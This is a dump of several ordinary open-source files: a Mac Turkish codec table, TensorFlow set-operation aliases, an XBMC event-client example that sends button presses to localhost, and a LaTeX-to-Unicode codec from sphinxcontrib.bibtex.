u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\uf8a0' # 0xF5 -> undefined1
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
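### Usage sketch: the table above matches Apple's Mac OS Turkish mapping
### (e.g. 0xDA -> U+011E), so assuming this module is registered under a
### name such as 'mac_turkish' (the actual codec name is an assumption):
###
### b'\xda'.decode('mac_turkish') # -> u'\u011e'
### u'\u011e'.encode('mac_turkish') # -> b'\xda'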
|
xodus7/tensorflow | refs/heads/master | tensorflow/contrib/metrics/python/ops/set_ops.py | 167 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python layer for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import sets
set_size = sets.set_size
set_intersection = sets.set_intersection
set_difference = sets.set_difference
set_union = sets.set_union
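# Usage sketch (rows of the inputs are interpreted as sets; assumes the
# standard tf.sets semantics that these names alias):
#
#   import tensorflow as tf
#   a = tf.constant([[1, 2, 3]], dtype=tf.int64)
#   b = tf.constant([[2, 3, 4]], dtype=tf.int64)
#   inter = set_intersection(a, b)  # SparseTensor holding {2, 3}
#   size = set_size(inter)          # dense int32 Tensor: [2]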
|
angelblue05/xbmc | refs/heads/master | tools/EventClients/examples/python/example_button1.py | 70 | #!/usr/bin/python
# This is a simple example showing how you can send 2 button events
# to XBMC in a queued fashion to shut it down.
# Queued button events are not repeatable.
# The basic idea is to create single packets and shoot them to XBMC
# The provided library implements some of the support commands and
# takes care of creating the actual packet. Using it is as simple
# as creating an object with the required constructor arguments and
# sending it through a socket.
# Currently, only keyboard keys are supported so the key codes used
# below are the same key codes used in guilib/common/SDLKeyboard.cpp
# In effect, anything that can be done with the keyboard can be done
# using the event client.
# import the XBMC client library
# NOTE: The library is not complete yet but is usable at this stage.
import sys
sys.path.append("../../lib/python")
from xbmcclient import *
from socket import *
def main():
import time
# connect to localhost, port 9777 using a UDP socket
# this only needs to be done once.
# by default this is where XBMC will be listening for incoming
# connections.
host = "localhost"
port = 9777
addr = (host, port)
sock = socket(AF_INET,SOCK_DGRAM)
# First packet must be HELO (no it's not a typo) and can contain an icon
# 'icon_type' can be one of ICON_NONE, ICON_PNG, ICON_JPG or ICON_GIF
packet = PacketHELO(devicename="Example Remote",
icon_type=ICON_PNG,
icon_file="../../icons/bluetooth.png")
packet.send(sock, addr)
# IMPORTANT: After a HELO packet is sent, the client needs to "ping" XBMC
# at least once every 60 seconds or else the client will time out.
# Every valid packet sent to XBMC acts as a ping, however if no valid
# packets NEED to be sent (eg. the user hasn't pressed a key in 50 seconds)
# then you can use the PacketPING class to send a ping packet (which is
# basically just an empty packet). See below.
# Once a client times out, it will need to reissue the HELO packet.
# Currently, since this is a unidirectional protocol, there is no way
# for the client to know if it has timed out.
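    # A ping is just an empty packet, e.g. (sketch; not needed in this
    # short script because every packet sent below also counts as a ping):
    # packet = PacketPING()
    # packet.send(sock, addr)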
# wait for notification window to close (in XBMC)
time.sleep(5)
# press 'S'
packet = PacketBUTTON(code='S', queue=1)
packet.send(sock, addr)
# wait for a few seconds
time.sleep(2)
# press the enter key (13 = enter)
packet = PacketBUTTON(code=13, queue=1)
packet.send(sock, addr)
# BYE is not required since XBMC would have shut down
packet = PacketBYE() # PacketPING if you want to ping
packet.send(sock, addr)
if __name__=="__main__":
main()
|
2014c2g19/2014c2g19 | refs/heads/master | exts/sphinxcontrib/bibtex/latex_codec.py | 38 | # -*- coding: utf-8 -*-
"""
Character translation utilities for LaTeX-formatted text
========================================================
Usage:
    - unicode(string,'latex')
    - ustring.decode('latex')
      are both available as soon as this module is imported (the codec
      search function is registered at import time).
    - unicode(string,'latex+latin1')
    - ustring.decode('latex+latin1')
      where latin1 can be replaced by any other known encoding, become
      available likewise after import (or after an explicit register()).
Copyright (c) 2003, 2008 David Eppstein
Copyright (c) 2011 Matthias C. M. Troffaes
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function
import codecs
import collections
import re
from sphinxcontrib.bibtex import latex_lexer
def register():
"""Enable encodings of the form 'latex+x' where x describes another encoding.
Unicode characters are translated to or from x when possible, otherwise
expanded to latex.
"""
codecs.register(find_latex)
# returns the codec search function
# this is used if latex_codec.py were to be placed in stdlib
def getregentry():
"""Encodings module API."""
return find_latex('latex')
class LatexUnicodeTable:
"""Tabulates a translation between latex and unicode."""
def __init__(self, lexer):
self.lexer = lexer
self.unicode_map = {}
self.max_length = 0
self.latex_map = {}
self.register_all()
def register_all(self):
# TODO complete this list
# register special symbols
self.register(u'\N{EN DASH}', b'--')
self.register(u'\N{EN DASH}', b'\\textendash')
self.register(u'\N{EM DASH}', b'---')
self.register(u'\N{EM DASH}', b'\\textemdash')
self.register(u'\N{LEFT SINGLE QUOTATION MARK}', b'`', decode=False)
self.register(u'\N{RIGHT SINGLE QUOTATION MARK}', b"'", decode=False)
self.register(u'\N{LEFT DOUBLE QUOTATION MARK}', b'``')
self.register(u'\N{RIGHT DOUBLE QUOTATION MARK}', b"''")
self.register(u'\N{DAGGER}', b'\\dag')
self.register(u'\N{DOUBLE DAGGER}', b'\\ddag')
self.register(u'\N{BULLET}', b'\\bullet', mode='math')
self.register(u'\N{BULLET}', b'\\textbullet', package='textcomp')
self.register(u'\N{NUMBER SIGN}', b'\\#')
self.register(u'\N{AMPERSAND}', b'\\&')
self.register(u'\N{NO-BREAK SPACE}', b'~')
self.register(u'\N{INVERTED EXCLAMATION MARK}', b'!`')
self.register(u'\N{CENT SIGN}', b'\\not{c}')
self.register(u'\N{POUND SIGN}', b'\\pounds')
self.register(u'\N{POUND SIGN}', b'\\textsterling', package='textcomp')
self.register(u'\N{SECTION SIGN}', b'\\S')
self.register(u'\N{DIAERESIS}', b'\\"{}')
self.register(u'\N{NOT SIGN}', b'\\neg')
self.register(u'\N{SOFT HYPHEN}', b'\\-')
self.register(u'\N{MACRON}', b'\\={}')
self.register(u'\N{DEGREE SIGN}', b'^\\circ', mode='math')
self.register(u'\N{DEGREE SIGN}', b'\\textdegree', package='textcomp')
self.register(u'\N{PLUS-MINUS SIGN}', b'\\pm', mode='math')
self.register(u'\N{PLUS-MINUS SIGN}', b'\\textpm', package='textcomp')
self.register(u'\N{SUPERSCRIPT TWO}', b'^2', mode='math')
self.register(u'\N{SUPERSCRIPT TWO}', b'\\texttwosuperior', package='textcomp')
self.register(u'\N{SUPERSCRIPT THREE}', b'^3', mode='math')
self.register(u'\N{SUPERSCRIPT THREE}', b'\\textthreesuperior', package='textcomp')
self.register(u'\N{ACUTE ACCENT}', b"\\'{}")
self.register(u'\N{MICRO SIGN}', b'\\mu', mode='math')
self.register(u'\N{MICRO SIGN}', b'\\micro', package='gensymb')
self.register(u'\N{PILCROW SIGN}', b'\\P')
self.register(u'\N{MIDDLE DOT}', b'\\cdot', mode='math')
self.register(u'\N{MIDDLE DOT}', b'\\textperiodcentered', package='textcomp')
self.register(u'\N{CEDILLA}', b'\\c{}')
self.register(u'\N{SUPERSCRIPT ONE}', b'^1', mode='math')
self.register(u'\N{SUPERSCRIPT ONE}', b'\\textonesuperior', package='textcomp')
self.register(u'\N{INVERTED QUESTION MARK}', b'?`')
self.register(u'\N{LATIN CAPITAL LETTER A WITH GRAVE}', b'\\`A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH CIRCUMFLEX}', b'\\^A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH TILDE}', b'\\~A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH DIAERESIS}', b'\\"A')
self.register(u'\N{LATIN CAPITAL LETTER A WITH RING ABOVE}', b'\\AA')
self.register(u'\N{LATIN CAPITAL LETTER AE}', b'\\AE')
self.register(u'\N{LATIN CAPITAL LETTER C WITH CEDILLA}', b'\\c C')
self.register(u'\N{LATIN CAPITAL LETTER E WITH GRAVE}', b'\\`E')
self.register(u'\N{LATIN CAPITAL LETTER E WITH ACUTE}', b"\\'E")
self.register(u'\N{LATIN CAPITAL LETTER E WITH CIRCUMFLEX}', b'\\^E')
self.register(u'\N{LATIN CAPITAL LETTER E WITH DIAERESIS}', b'\\"E')
self.register(u'\N{LATIN CAPITAL LETTER I WITH GRAVE}', b'\\`I')
self.register(u'\N{LATIN CAPITAL LETTER I WITH CIRCUMFLEX}', b'\\^I')
self.register(u'\N{LATIN CAPITAL LETTER I WITH DIAERESIS}', b'\\"I')
self.register(u'\N{LATIN CAPITAL LETTER N WITH TILDE}', b'\\~N')
self.register(u'\N{LATIN CAPITAL LETTER O WITH GRAVE}', b'\\`O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH ACUTE}', b"\\'O")
self.register(u'\N{LATIN CAPITAL LETTER O WITH CIRCUMFLEX}', b'\\^O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH TILDE}', b'\\~O')
self.register(u'\N{LATIN CAPITAL LETTER O WITH DIAERESIS}', b'\\"O')
self.register(u'\N{MULTIPLICATION SIGN}', b'\\times', mode='math')
self.register(u'\N{LATIN CAPITAL LETTER O WITH STROKE}', b'\\O')
self.register(u'\N{LATIN CAPITAL LETTER U WITH GRAVE}', b'\\`U')
self.register(u'\N{LATIN CAPITAL LETTER U WITH ACUTE}', b"\\'U")
self.register(u'\N{LATIN CAPITAL LETTER U WITH CIRCUMFLEX}', b'\\^U')
self.register(u'\N{LATIN CAPITAL LETTER U WITH DIAERESIS}', b'\\"U')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH ACUTE}', b"\\'Y")
self.register(u'\N{LATIN SMALL LETTER SHARP S}', b'\\ss')
self.register(u'\N{LATIN SMALL LETTER A WITH GRAVE}', b'\\`a')
self.register(u'\N{LATIN SMALL LETTER A WITH ACUTE}', b"\\'a")
self.register(u'\N{LATIN SMALL LETTER A WITH CIRCUMFLEX}', b'\\^a')
self.register(u'\N{LATIN SMALL LETTER A WITH TILDE}', b'\\~a')
self.register(u'\N{LATIN SMALL LETTER A WITH DIAERESIS}', b'\\"a')
self.register(u'\N{LATIN SMALL LETTER A WITH RING ABOVE}', b'\\aa')
self.register(u'\N{LATIN SMALL LETTER AE}', b'\\ae')
self.register(u'\N{LATIN SMALL LETTER C WITH CEDILLA}', b'\\c c')
self.register(u'\N{LATIN SMALL LETTER E WITH GRAVE}', b'\\`e')
self.register(u'\N{LATIN SMALL LETTER E WITH ACUTE}', b"\\'e")
self.register(u'\N{LATIN SMALL LETTER E WITH CIRCUMFLEX}', b'\\^e')
self.register(u'\N{LATIN SMALL LETTER E WITH DIAERESIS}', b'\\"e')
self.register(u'\N{LATIN SMALL LETTER I WITH GRAVE}', b'\\`\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH GRAVE}', b'\\`i')
self.register(u'\N{LATIN SMALL LETTER I WITH ACUTE}', b"\\'\\i")
self.register(u'\N{LATIN SMALL LETTER I WITH ACUTE}', b"\\'i")
self.register(u'\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', b'\\^\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH CIRCUMFLEX}', b'\\^i')
self.register(u'\N{LATIN SMALL LETTER I WITH DIAERESIS}', b'\\"\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH DIAERESIS}', b'\\"i')
self.register(u'\N{LATIN SMALL LETTER N WITH TILDE}', b'\\~n')
self.register(u'\N{LATIN SMALL LETTER O WITH GRAVE}', b'\\`o')
self.register(u'\N{LATIN SMALL LETTER O WITH ACUTE}', b"\\'o")
self.register(u'\N{LATIN SMALL LETTER O WITH CIRCUMFLEX}', b'\\^o')
self.register(u'\N{LATIN SMALL LETTER O WITH TILDE}', b'\\~o')
self.register(u'\N{LATIN SMALL LETTER O WITH DIAERESIS}', b'\\"o')
self.register(u'\N{DIVISION SIGN}', b'\\div', mode='math')
self.register(u'\N{LATIN SMALL LETTER O WITH STROKE}', b'\\o')
self.register(u'\N{LATIN SMALL LETTER U WITH GRAVE}', b'\\`u')
self.register(u'\N{LATIN SMALL LETTER U WITH ACUTE}', b"\\'u")
self.register(u'\N{LATIN SMALL LETTER U WITH CIRCUMFLEX}', b'\\^u')
self.register(u'\N{LATIN SMALL LETTER U WITH DIAERESIS}', b'\\"u')
self.register(u'\N{LATIN SMALL LETTER Y WITH ACUTE}', b"\\'y")
self.register(u'\N{LATIN SMALL LETTER Y WITH DIAERESIS}', b'\\"y')
self.register(u'\N{LATIN CAPITAL LETTER A WITH MACRON}', b'\\=A')
self.register(u'\N{LATIN SMALL LETTER A WITH MACRON}', b'\\=a')
self.register(u'\N{LATIN CAPITAL LETTER A WITH BREVE}', b'\\u A')
self.register(u'\N{LATIN SMALL LETTER A WITH BREVE}', b'\\u a')
self.register(u'\N{LATIN CAPITAL LETTER A WITH OGONEK}', b'\\c A')
self.register(u'\N{LATIN SMALL LETTER A WITH OGONEK}', b'\\c a')
self.register(u'\N{LATIN CAPITAL LETTER C WITH ACUTE}', b"\\'C")
self.register(u'\N{LATIN SMALL LETTER C WITH ACUTE}', b"\\'c")
self.register(u'\N{LATIN CAPITAL LETTER C WITH CIRCUMFLEX}', b'\\^C')
self.register(u'\N{LATIN SMALL LETTER C WITH CIRCUMFLEX}', b'\\^c')
self.register(u'\N{LATIN CAPITAL LETTER C WITH DOT ABOVE}', b'\\.C')
self.register(u'\N{LATIN SMALL LETTER C WITH DOT ABOVE}', b'\\.c')
self.register(u'\N{LATIN CAPITAL LETTER C WITH CARON}', b'\\v C')
self.register(u'\N{LATIN SMALL LETTER C WITH CARON}', b'\\v c')
self.register(u'\N{LATIN CAPITAL LETTER D WITH CARON}', b'\\v D')
self.register(u'\N{LATIN SMALL LETTER D WITH CARON}', b'\\v d')
self.register(u'\N{LATIN CAPITAL LETTER E WITH MACRON}', b'\\=E')
self.register(u'\N{LATIN SMALL LETTER E WITH MACRON}', b'\\=e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH BREVE}', b'\\u E')
self.register(u'\N{LATIN SMALL LETTER E WITH BREVE}', b'\\u e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH DOT ABOVE}', b'\\.E')
self.register(u'\N{LATIN SMALL LETTER E WITH DOT ABOVE}', b'\\.e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH OGONEK}', b'\\c E')
self.register(u'\N{LATIN SMALL LETTER E WITH OGONEK}', b'\\c e')
self.register(u'\N{LATIN CAPITAL LETTER E WITH CARON}', b'\\v E')
self.register(u'\N{LATIN SMALL LETTER E WITH CARON}', b'\\v e')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CIRCUMFLEX}', b'\\^G')
self.register(u'\N{LATIN SMALL LETTER G WITH CIRCUMFLEX}', b'\\^g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH BREVE}', b'\\u G')
self.register(u'\N{LATIN SMALL LETTER G WITH BREVE}', b'\\u g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH DOT ABOVE}', b'\\.G')
self.register(u'\N{LATIN SMALL LETTER G WITH DOT ABOVE}', b'\\.g')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CEDILLA}', b'\\c G')
self.register(u'\N{LATIN SMALL LETTER G WITH CEDILLA}', b'\\c g')
self.register(u'\N{LATIN CAPITAL LETTER H WITH CIRCUMFLEX}', b'\\^H')
self.register(u'\N{LATIN SMALL LETTER H WITH CIRCUMFLEX}', b'\\^h')
self.register(u'\N{LATIN CAPITAL LETTER I WITH TILDE}', b'\\~I')
self.register(u'\N{LATIN SMALL LETTER I WITH TILDE}', b'\\~\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH TILDE}', b'\\~i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH MACRON}', b'\\=I')
self.register(u'\N{LATIN SMALL LETTER I WITH MACRON}', b'\\=\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH MACRON}', b'\\=i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH BREVE}', b'\\u I')
self.register(u'\N{LATIN SMALL LETTER I WITH BREVE}', b'\\u\\i')
self.register(u'\N{LATIN SMALL LETTER I WITH BREVE}', b'\\u i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH OGONEK}', b'\\c I')
self.register(u'\N{LATIN SMALL LETTER I WITH OGONEK}', b'\\c i')
self.register(u'\N{LATIN CAPITAL LETTER I WITH DOT ABOVE}', b'\\.I')
self.register(u'\N{LATIN SMALL LETTER DOTLESS I}', b'\\i')
self.register(u'\N{LATIN CAPITAL LIGATURE IJ}', b'IJ', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE IJ}', b'ij', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER J WITH CIRCUMFLEX}', b'\\^J')
self.register(u'\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', b'\\^\\j')
self.register(u'\N{LATIN SMALL LETTER J WITH CIRCUMFLEX}', b'\\^j')
self.register(u'\N{LATIN CAPITAL LETTER K WITH CEDILLA}', b'\\c K')
self.register(u'\N{LATIN SMALL LETTER K WITH CEDILLA}', b'\\c k')
self.register(u'\N{LATIN CAPITAL LETTER L WITH ACUTE}', b"\\'L")
self.register(u'\N{LATIN SMALL LETTER L WITH ACUTE}', b"\\'l")
self.register(u'\N{LATIN CAPITAL LETTER L WITH CEDILLA}', b'\\c L')
self.register(u'\N{LATIN SMALL LETTER L WITH CEDILLA}', b'\\c l')
self.register(u'\N{LATIN CAPITAL LETTER L WITH CARON}', b'\\v L')
self.register(u'\N{LATIN SMALL LETTER L WITH CARON}', b'\\v l')
self.register(u'\N{LATIN CAPITAL LETTER L WITH STROKE}', b'\\L')
self.register(u'\N{LATIN SMALL LETTER L WITH STROKE}', b'\\l')
self.register(u'\N{LATIN CAPITAL LETTER N WITH ACUTE}', b"\\'N")
self.register(u'\N{LATIN SMALL LETTER N WITH ACUTE}', b"\\'n")
self.register(u'\N{LATIN CAPITAL LETTER N WITH CEDILLA}', b'\\c N')
self.register(u'\N{LATIN SMALL LETTER N WITH CEDILLA}', b'\\c n')
self.register(u'\N{LATIN CAPITAL LETTER N WITH CARON}', b'\\v N')
self.register(u'\N{LATIN SMALL LETTER N WITH CARON}', b'\\v n')
self.register(u'\N{LATIN CAPITAL LETTER O WITH MACRON}', b'\\=O')
self.register(u'\N{LATIN SMALL LETTER O WITH MACRON}', b'\\=o')
self.register(u'\N{LATIN CAPITAL LETTER O WITH BREVE}', b'\\u O')
self.register(u'\N{LATIN SMALL LETTER O WITH BREVE}', b'\\u o')
self.register(u'\N{LATIN CAPITAL LETTER O WITH DOUBLE ACUTE}', b'\\H O')
self.register(u'\N{LATIN SMALL LETTER O WITH DOUBLE ACUTE}', b'\\H o')
self.register(u'\N{LATIN CAPITAL LIGATURE OE}', b'\\OE')
self.register(u'\N{LATIN SMALL LIGATURE OE}', b'\\oe')
self.register(u'\N{LATIN CAPITAL LETTER R WITH ACUTE}', b"\\'R")
self.register(u'\N{LATIN SMALL LETTER R WITH ACUTE}', b"\\'r")
self.register(u'\N{LATIN CAPITAL LETTER R WITH CEDILLA}', b'\\c R')
self.register(u'\N{LATIN SMALL LETTER R WITH CEDILLA}', b'\\c r')
self.register(u'\N{LATIN CAPITAL LETTER R WITH CARON}', b'\\v R')
self.register(u'\N{LATIN SMALL LETTER R WITH CARON}', b'\\v r')
self.register(u'\N{LATIN CAPITAL LETTER S WITH ACUTE}', b"\\'S")
self.register(u'\N{LATIN SMALL LETTER S WITH ACUTE}', b"\\'s")
self.register(u'\N{LATIN CAPITAL LETTER S WITH CIRCUMFLEX}', b'\\^S')
self.register(u'\N{LATIN SMALL LETTER S WITH CIRCUMFLEX}', b'\\^s')
self.register(u'\N{LATIN CAPITAL LETTER S WITH CEDILLA}', b'\\c S')
self.register(u'\N{LATIN SMALL LETTER S WITH CEDILLA}', b'\\c s')
self.register(u'\N{LATIN CAPITAL LETTER S WITH CARON}', b'\\v S')
self.register(u'\N{LATIN SMALL LETTER S WITH CARON}', b'\\v s')
self.register(u'\N{LATIN CAPITAL LETTER T WITH CEDILLA}', b'\\c T')
self.register(u'\N{LATIN SMALL LETTER T WITH CEDILLA}', b'\\c t')
self.register(u'\N{LATIN CAPITAL LETTER T WITH CARON}', b'\\v T')
self.register(u'\N{LATIN SMALL LETTER T WITH CARON}', b'\\v t')
self.register(u'\N{LATIN CAPITAL LETTER U WITH TILDE}', b'\\~U')
self.register(u'\N{LATIN SMALL LETTER U WITH TILDE}', b'\\~u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH MACRON}', b'\\=U')
self.register(u'\N{LATIN SMALL LETTER U WITH MACRON}', b'\\=u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH BREVE}', b'\\u U')
self.register(u'\N{LATIN SMALL LETTER U WITH BREVE}', b'\\u u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH RING ABOVE}', b'\\r U')
self.register(u'\N{LATIN SMALL LETTER U WITH RING ABOVE}', b'\\r u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH DOUBLE ACUTE}', b'\\H U')
self.register(u'\N{LATIN SMALL LETTER U WITH DOUBLE ACUTE}', b'\\H u')
self.register(u'\N{LATIN CAPITAL LETTER U WITH OGONEK}', b'\\c U')
self.register(u'\N{LATIN SMALL LETTER U WITH OGONEK}', b'\\c u')
self.register(u'\N{LATIN CAPITAL LETTER W WITH CIRCUMFLEX}', b'\\^W')
self.register(u'\N{LATIN SMALL LETTER W WITH CIRCUMFLEX}', b'\\^w')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH CIRCUMFLEX}', b'\\^Y')
self.register(u'\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}', b'\\^y')
self.register(u'\N{LATIN CAPITAL LETTER Y WITH DIAERESIS}', b'\\"Y')
self.register(u'\N{LATIN CAPITAL LETTER Z WITH ACUTE}', b"\\'Z")
        self.register(u'\N{LATIN SMALL LETTER Z WITH ACUTE}', b"\\'z")
self.register(u'\N{LATIN CAPITAL LETTER Z WITH DOT ABOVE}', b'\\.Z')
        self.register(u'\N{LATIN SMALL LETTER Z WITH DOT ABOVE}', b'\\.z')
self.register(u'\N{LATIN CAPITAL LETTER Z WITH CARON}', b'\\v Z')
self.register(u'\N{LATIN SMALL LETTER Z WITH CARON}', b'\\v z')
self.register(u'\N{LATIN CAPITAL LETTER DZ WITH CARON}', b'D\\v Z')
self.register(u'\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z WITH CARON}', b'D\\v z')
self.register(u'\N{LATIN SMALL LETTER DZ WITH CARON}', b'd\\v z')
self.register(u'\N{LATIN CAPITAL LETTER LJ}', b'LJ', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER L WITH SMALL LETTER J}', b'Lj', decode=False)
self.register(u'\N{LATIN SMALL LETTER LJ}', b'lj', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER NJ}', b'NJ', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER N WITH SMALL LETTER J}', b'Nj', decode=False)
self.register(u'\N{LATIN SMALL LETTER NJ}', b'nj', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER A WITH CARON}', b'\\v A')
self.register(u'\N{LATIN SMALL LETTER A WITH CARON}', b'\\v a')
self.register(u'\N{LATIN CAPITAL LETTER I WITH CARON}', b'\\v I')
self.register(u'\N{LATIN SMALL LETTER I WITH CARON}', b'\\v\\i')
self.register(u'\N{LATIN CAPITAL LETTER O WITH CARON}', b'\\v O')
self.register(u'\N{LATIN SMALL LETTER O WITH CARON}', b'\\v o')
self.register(u'\N{LATIN CAPITAL LETTER U WITH CARON}', b'\\v U')
self.register(u'\N{LATIN SMALL LETTER U WITH CARON}', b'\\v u')
self.register(u'\N{LATIN CAPITAL LETTER G WITH CARON}', b'\\v G')
self.register(u'\N{LATIN SMALL LETTER G WITH CARON}', b'\\v g')
self.register(u'\N{LATIN CAPITAL LETTER K WITH CARON}', b'\\v K')
self.register(u'\N{LATIN SMALL LETTER K WITH CARON}', b'\\v k')
self.register(u'\N{LATIN CAPITAL LETTER O WITH OGONEK}', b'\\c O')
self.register(u'\N{LATIN SMALL LETTER O WITH OGONEK}', b'\\c o')
self.register(u'\N{LATIN SMALL LETTER J WITH CARON}', b'\\v\\j')
self.register(u'\N{LATIN CAPITAL LETTER DZ}', b'DZ')
self.register(u'\N{LATIN CAPITAL LETTER D WITH SMALL LETTER Z}', b'Dz', decode=False)
self.register(u'\N{LATIN SMALL LETTER DZ}', b'dz', decode=False)
self.register(u'\N{LATIN CAPITAL LETTER G WITH ACUTE}', b"\\'G")
self.register(u'\N{LATIN SMALL LETTER G WITH ACUTE}', b"\\'g")
self.register(u'\N{LATIN CAPITAL LETTER AE WITH ACUTE}', b"\\'\\AE")
self.register(u'\N{LATIN SMALL LETTER AE WITH ACUTE}', b"\\'\\ae")
self.register(u'\N{LATIN CAPITAL LETTER O WITH STROKE AND ACUTE}', b"\\'\\O")
self.register(u'\N{LATIN SMALL LETTER O WITH STROKE AND ACUTE}', b"\\'\\o")
self.register(u'\N{PARTIAL DIFFERENTIAL}', b'\\partial', mode='math')
self.register(u'\N{N-ARY PRODUCT}', b'\\prod', mode='math')
self.register(u'\N{N-ARY SUMMATION}', b'\\sum', mode='math')
self.register(u'\N{SQUARE ROOT}', b'\\surd', mode='math')
self.register(u'\N{INFINITY}', b'\\infty', mode='math')
self.register(u'\N{INTEGRAL}', b'\\int', mode='math')
self.register(u'\N{INTERSECTION}', b'\\cap', mode='math')
self.register(u'\N{UNION}', b'\\cup', mode='math')
self.register(u'\N{RIGHTWARDS ARROW}', b'\\rightarrow', mode='math')
self.register(u'\N{RIGHTWARDS DOUBLE ARROW}', b'\\Rightarrow', mode='math')
self.register(u'\N{LEFTWARDS ARROW}', b'\\leftarrow', mode='math')
self.register(u'\N{LEFTWARDS DOUBLE ARROW}', b'\\Leftarrow', mode='math')
self.register(u'\N{LOGICAL OR}', b'\\vee', mode='math')
self.register(u'\N{LOGICAL AND}', b'\\wedge', mode='math')
self.register(u'\N{ALMOST EQUAL TO}', b'\\approx', mode='math')
self.register(u'\N{NOT EQUAL TO}', b'\\neq', mode='math')
self.register(u'\N{LESS-THAN OR EQUAL TO}', b'\\leq', mode='math')
self.register(u'\N{GREATER-THAN OR EQUAL TO}', b'\\geq', mode='math')
self.register(u'\N{MODIFIER LETTER CIRCUMFLEX ACCENT}', b'\\^{}')
self.register(u'\N{CARON}', b'\\v{}')
self.register(u'\N{BREVE}', b'\\u{}')
self.register(u'\N{DOT ABOVE}', b'\\.{}')
self.register(u'\N{RING ABOVE}', b'\\r{}')
self.register(u'\N{OGONEK}', b'\\c{}')
self.register(u'\N{SMALL TILDE}', b'\\~{}')
self.register(u'\N{DOUBLE ACUTE ACCENT}', b'\\H{}')
self.register(u'\N{LATIN SMALL LIGATURE FI}', b'fi', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE FL}', b'fl', decode=False)
self.register(u'\N{LATIN SMALL LIGATURE FF}', b'ff', decode=False)
self.register(u'\N{GREEK SMALL LETTER ALPHA}', b'\\alpha', mode='math')
self.register(u'\N{GREEK SMALL LETTER BETA}', b'\\beta', mode='math')
self.register(u'\N{GREEK SMALL LETTER GAMMA}', b'\\gamma', mode='math')
self.register(u'\N{GREEK SMALL LETTER DELTA}', b'\\delta', mode='math')
self.register(u'\N{GREEK SMALL LETTER EPSILON}', b'\\epsilon', mode='math')
self.register(u'\N{GREEK SMALL LETTER ZETA}', b'\\zeta', mode='math')
self.register(u'\N{GREEK SMALL LETTER ETA}', b'\\eta', mode='math')
self.register(u'\N{GREEK SMALL LETTER THETA}', b'\\theta', mode='math')
self.register(u'\N{GREEK SMALL LETTER IOTA}', b'\\iota', mode='math')
self.register(u'\N{GREEK SMALL LETTER KAPPA}', b'\\kappa', mode='math')
self.register(u'\N{GREEK SMALL LETTER LAMDA}', b'\\lambda', mode='math') # LAMDA not LAMBDA
self.register(u'\N{GREEK SMALL LETTER MU}', b'\\mu', mode='math')
